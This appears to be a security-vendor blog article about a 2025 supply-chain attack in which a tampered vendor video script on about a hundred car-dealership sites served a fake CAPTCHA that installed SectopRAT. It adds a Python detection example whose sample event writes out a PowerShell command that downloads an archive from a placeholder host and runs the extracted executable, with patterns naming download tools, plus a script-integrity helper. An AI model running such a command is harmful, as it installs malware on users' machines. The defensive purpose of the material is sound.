A Supply Chain Attack Has Affected 100 Car Dealerships

Imagine visiting your favorite car dealership’s website, maybe to schedule a test drive, watch a car review video, or browse new arrivals. Everything looks normal until a pop-up interrupts, asking you to prove you’re not a robot. It seems simple: you follow instructions and paste a command into your Windows Run prompt. However, this action unintentionally exposes you to cybercriminals. That’s exactly what happened to thousands of visitors in a massive attack that exploited over one hundred car dealerships across the United States. The breach came through a third-party video provider that dealerships trusted, making the incident a textbook example of a supply chain attack. 

Every dealership website using the service automatically loaded the malicious code that the attackers inserted into a widely used video script. This allowed the attackers to serve a fake security check that manipulated users into infecting their devices with a powerful remote access trojan called SectopRAT. This article explains how it happened, who might be responsible, what the damage looks like, and, most importantly, how you can protect yourself from such deceptive cyber threats. 

What actually happened? 

In March 2025, cybersecurity experts uncovered a highly advanced cyber campaign that affected more than one hundred car dealership websites. The attackers exploited LES Automotive, a third-party service provider, rather than directly hacking these websites. LES offered video content tools embedded on dealership sites to display promotional videos, which were hosted and updated centrally. 

The attackers successfully altered the JavaScript file, incorporating their own malicious code. As a result, any dealership website using the script automatically started loading the modified version. 

These websites automatically redirected visitors to a fake CAPTCHA page hosted at a domain named securityconfirmation.help. This page displayed a seemingly harmless prompt saying, “Verify you are not a robot.” It mimicked a standard Google-style CAPTCHA to build trust. 

What made this attack different was what came next. The page used JavaScript to silently copy a Windows PowerShell command into the user’s copy buffer. It then instructed the visitor to open the Run prompt on their PC, paste the command, and press Enter. Once executed, that command downloaded and installed a remote access tool called SectopRAT, silently giving attackers control over the victim’s system. 

This was not a typical phishing link. It was a hidden attack, using a trusted video script to reach a large audience, many of whom had no reason to suspect foul play. The impact involved unauthorized system access, data theft, and the potential for further attacks such as ransomware or credential harvesting. 


How the Supply Chain Attack Hit 100 Car Dealerships

Here is a detailed walkthrough of how the cyberattack unfolded:

Vendor Compromise

The attackers first infiltrated LES Automotive, the video service provider used by car dealerships. They likely gained access either through stolen login credentials or by exploiting a vulnerability in the provider’s system. Once inside, they had the power to modify shared scripts.

Malicious Script Injection

The attackers edited the video script file, inserting obfuscated (hidden) JavaScript code. This new code included a link to a fake CAPTCHA page designed to trick users.

Fake CAPTCHA Page Delivered

When a user visited a dealership website, they were redirected to a page called captchav2.html. It was hosted on a malicious domain and looked just like a standard “I’m not a robot” checkbox, nothing suspicious at first glance.

Clipboard Trickery

Behind the scenes, the fake CAPTCHA silently inserted a PowerShell command into the user’s clipboard. Once the user clicked the checkbox, they were prompted to press Windows + R to open the Run dialog, paste the preloaded command, and press Enter, unknowingly executing malicious code on their system.

Malware Download and Execution

That command fetched a file named Lancaster.zip from a remote server. It extracted an executable called zkwindow.exe and silently ran it, infecting the victim’s PC with SectopRAT, an advanced remote access trojan.

Persistent Backdoor Created

Once inside, SectopRAT stayed hidden but gave attackers full control. They could steal passwords, monitor browsing activity, or even use the infected system in future fraud or ransomware campaigns.

The dealerships themselves escaped direct hacking because the code arrived through a trusted vendor script. However, their websites became silent delivery vehicles for malware. 
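One way a defender can spot the Run-dialog step of this chain in endpoint telemetry, as an added example that is not part of the original article: the events below are constructed Sysmon-style process-creation records (the hxxp placeholder URL, the benign events and the file name L.zip are assumptions; Lancaster.zip and zkwindow.exe come from the article), and the rule flags a shell launched directly under explorer.exe, which is what Windows + R produces, whose command line carries download or extraction indicators.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Event 0 mirrors the ClickFix chain described above; the rest are benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr hxxp://PLACEHOLDER.invalid/Lancaster.zip'
                    ' -OutFile L.zip; Expand-Archive L.zip; Start-Process .\\zkwindow.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Date"},  # user typed a harmless command into Run
    {"ParentImage": r"C:\Program Files\Scheduler\sched.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\ops\\backup.ps1 -w hidden"},  # automation, not Run
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Win+R starts its child directly under explorer.exe. That alone is normal,
# so a hit requires a shell under that parent AND a command-line indicator.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", "network fetch"),
    (r"\bexpand-archive\b|\.zip\b", "archive extraction"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the matched indicator labels, or [] if the event is not flagged."""
    if _basename(event["Image"]) not in SHELLS:
        return []
    if _basename(event["ParentImage"]) not in RUN_DIALOG_PARENTS:
        return []
    cmd = event["CommandLine"]
    return [label for pat, label in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]


def flag_events(events: list) -> dict:
    """Map event index -> reasons for every event that looks like a Run-dialog ClickFix launch."""
    return {i: score_event(ev) for i, ev in enumerate(events) if score_event(ev)}


if __name__ == "__main__":
    print(flag_events(SAMPLE_EVENTS))  # only event 0 is reported
```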

Who Was Behind the Attack? 

While no one has officially claimed responsibility, several clues point to a cybercriminal group believed to operate out of Russian-speaking regions. 

For example, comments found in the JavaScript code were written in Russian, suggesting the attackers’ origin or at least their language preference. The use of SectopRAT also adds weight to this theory, as this specific remote access tool has historically been used by organized cybercrime groups from Eastern Europe. 

The attack method closely resembles previous incidents linked to a suspected group responsible for the BlackSuit ransomware. That group was behind the June 2024 breach of CDK Global, a major software vendor for car dealerships. That earlier attack shut down thousands of dealership systems across the country, leading to widespread disruption and financial loss. 

In this 2025 incident, the attackers used a more subtle method. Instead of disrupting operations, they silently infected consumers. Their objective was to exfiltrate sensitive data and set up future fraud operations. The fact that they chose LES Automotive, used by many dealerships, shows how carefully they selected their target. It was not random; it was strategic, calculated, and executed by experienced cybercriminals. 

Everything from the scripting tactics to the malware choice indicates that the attack was not the work of amateurs. It reflects planning, technical capability, and an understanding of the U.S. auto industry’s digital ecosystem. 

Consequences and Financial Impacts 

The impact of this cyberattack is broad, affecting both consumers and businesses. For visitors to the dealership websites, the consequences were immediate but not always visible. Those who followed the fake CAPTCHA’s instructions unknowingly installed malware. The act paved the way for the theft of personal data, the compromise of credentials, and the potential for future ransomware attacks or financial fraud. 

Although their internal systems were not directly compromised, dealerships faced significant harm to their reputations. Customers depend on brands to guarantee their online security. Tricking visitors into downloading malware through a dealership site shatters that trust. The result? Customers lose confidence in the dealership, which may face legal consequences and increasing pressure to demonstrate the reliability of its digital security.

To understand the financial impact, consider the 2024 CDK Global breach. That incident caused disruptions costing more than 605 million dollars within just two weeks. Experts estimate that the total financial damage could eventually cross the one billion dollar mark. Although the dealership systems remained operational in this case, the widespread malware infections may carry similar costs, especially if class-action lawsuits or federal investigations follow. 

Additionally, consumers affected by identity theft or ransomware might suffer losses of tens of thousands of dollars per person. Regulatory bodies like the U.S. Federal Trade Commission are paying close attention, and companies that fail to safeguard user data can face significant fines. This event is not just a tech issue; it has become a public trust and consumer protection concern. 

How to Protect Yourself 

To reduce your risk, whether you’re a consumer or a business, follow these best practices:

1. Never run commands from random sources. If a website tells you to copy a command into Windows Run, that is a major red flag. 

2. Use strong endpoint protection. Good antivirus or endpoint detection software can stop malware, including remote access tools like SectopRAT. 

3. Carefully evaluate your third-party vendors. Ensure they use signed scripts and keep them under version control. Unsigned or dynamically loaded scripts are easier to tamper with.

4. Monitor all third-party script changes. Use tools that check for unexpected changes to shared assets like JavaScript files. 

5. Keep vendor code in isolated zones. Isolating a compromised script from sensitive systems can limit its damage.

6. Train users and employees. Awareness is one of the best defenses against social engineering tricks like fake captchas and clipboard attacks. 

7. Have an incident response plan. Know in advance how your team will handle a cyber incident so you can respond quickly and effectively. 
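Added example covering points 3 and 4, not code from the article or from LES Automotive: a small Python helper that computes Subresource Integrity (SRI) tokens for a vendor script, emits the pinned script tag a dealership site would embed, and flags when a freshly fetched copy no longer matches the approved baseline. The script bodies and the vendor URL are constructed placeholders.

```python
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests SRI accepts


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Return an SRI token such as 'sha384-<base64 digest>' for a script body."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI permits only {SRI_ALGOS}, not {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, data: bytes) -> str:
    """Build the <script> tag that pins the vendor script to its approved digest.
    A browser refuses to run the script if the fetched bytes do not match."""
    return (f'<script src="{src}" integrity="{sri_hash(data)}" '
            'crossorigin="anonymous"></script>')


def check_vendor_script(baseline: str, current: bytes) -> dict:
    """Compare a freshly fetched copy against the pinned baseline token.
    'changed' is True when the vendor asset differs from what was approved."""
    algo = baseline.split("-", 1)[0]
    observed = sri_hash(current, algo)
    return {"changed": observed != baseline, "expected": baseline, "observed": observed}


# Constructed stand-ins for the vendor's video script (not the real LES file).
APPROVED_SCRIPT = b"(function(){ /* video widget v1 */ })();"
TAMPERED_SCRIPT = APPROVED_SCRIPT + b"\n/* injected code would follow here */"
VENDOR_URL = "https://vendor.invalid/video.js"  # placeholder, assumed

if __name__ == "__main__":
    baseline = sri_hash(APPROVED_SCRIPT)
    print(script_tag(VENDOR_URL, APPROVED_SCRIPT))
    print(check_vendor_script(baseline, APPROVED_SCRIPT)["changed"])  # False
    print(check_vendor_script(baseline, TAMPERED_SCRIPT)["changed"])  # True
```

Because a centrally updated vendor script will legitimately change from time to time, the monitor is what tells you when the pinned token needs review and re-approval, instead of the site either silently breaking or silently trusting whatever the vendor now serves.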


Final Thoughts

This attack reminds us that cybersecurity is often weakest at the supply chain level. A single third-party vendor with poor security can compromise dozens or even hundreds of other systems. In this case, the impact on many dealerships was not due to system flaws but rather to their reliance on an unverified script from a vendor. 


Here is a short checklist:

  • Always vet and monitor external scripts and services. 
  • Use security solutions that detect unusual behavior patterns, not just known malware. 
  • Educate your team and customers about the risks of social engineering. 
  • Plan for worst-case scenarios through detailed response protocols. 
  • And finally, as an internet user, treat any instruction to paste commands on your computer with extreme caution. As a business, treat every third-party integration as a possible vulnerability. 

Hoplon Infosec